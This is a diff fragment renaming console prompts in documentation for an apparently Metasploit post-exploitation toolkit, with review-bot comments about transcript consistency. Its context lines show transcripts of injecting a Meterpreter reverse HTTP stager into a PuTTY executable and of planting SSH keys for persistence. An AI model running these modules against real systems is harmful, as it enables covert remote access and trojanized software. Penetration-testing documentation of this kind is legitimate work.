@@ -86,13 +86,13 @@ Module options (post/windows/manage/peinjector): SESSION 1 yes The session to run this module on. TARGETPE C:\users\msfuser\downloads\puttyx64.exe no Path of the target executable to be injected -msf5 post(windows/manage/peinjector) > run +msf post(windows/manage/peinjector) > run [*] Running module against WIN10X64-1511 [*] Generating payload [*] Injecting Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTP Stager (wininet) into the executable C:\users\msfuser\downloads\puttyx64.exe [+] Successfully injected payload into the executable: C:\users\msfuser\downloads\puttyx64.exe [*] Post module execution completed -msf5 post(windows/manage/peinjector) > +msf post(windows/manage/peinjector) > ``` diff --git a/documentation/modules/post/windows/manage/sshkey_persistence.md b/documentation/modules/post/windows/manage/sshkey_persistence.md index 41fba9bf2b..5234847ca5 100644 --- a/documentation/modules/post/windows/manage/sshkey_persistence.md +++ b/documentation/modules/post/windows/manage/sshkey_persistence.md @@ -67,7 +67,7 @@ Use the post module to write the ssh key SESSION => 1 msf post(sshkey_persistence) > set CREATESSHFOLDER true CreateSSHFolder => true - msf5 post(windows/manage/sshkey_persistence) > run + msf post(windows/manage/sshkey_persistence) > run [*] Checking SSH Permissions [*] Authorized Keys File: .ssh/authorized_keys
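Review bot: in documentation/modules/post/windows/manage/sshkey_persistence.md (hunk `@@ -67,7 +67,7 @@`) the transcript still mixes two prompt forms after this change. The unchanged context line reads `msf post(sshkey_persistence) > set CREATESSHFOLDER true`, while the edited line reads `msf post(windows/manage/sshkey_persistence) > run`. Since the file is already being touched for prompt consistency, update the context prompts to the full module path too, so the session reads as one console run. Separately, the echo `CreateSSHFolder => true` differs in case from the option name typed on the line before it, whereas the other transcripts in this patch echo the name as typed (`set PID 8504` gives `PID => 8504`, `set lhost ...` gives `lhost => ...`). Check it against real console output if the transcript is refreshed.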
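Review bot: the last hunk of documentation/modules/post/windows/manage/execute_dotnet_assembly.md (`@@ -151,4 +151,4 @@`) only adds the missing end-of-file newline after the closing fence, which is unrelated to the `msf5` to `msf` prompt rename. The fix is harmless, but mention it in the commit message or move it to a separate whitespace commit, so the rename stays a purely mechanical diff that is easy to audit.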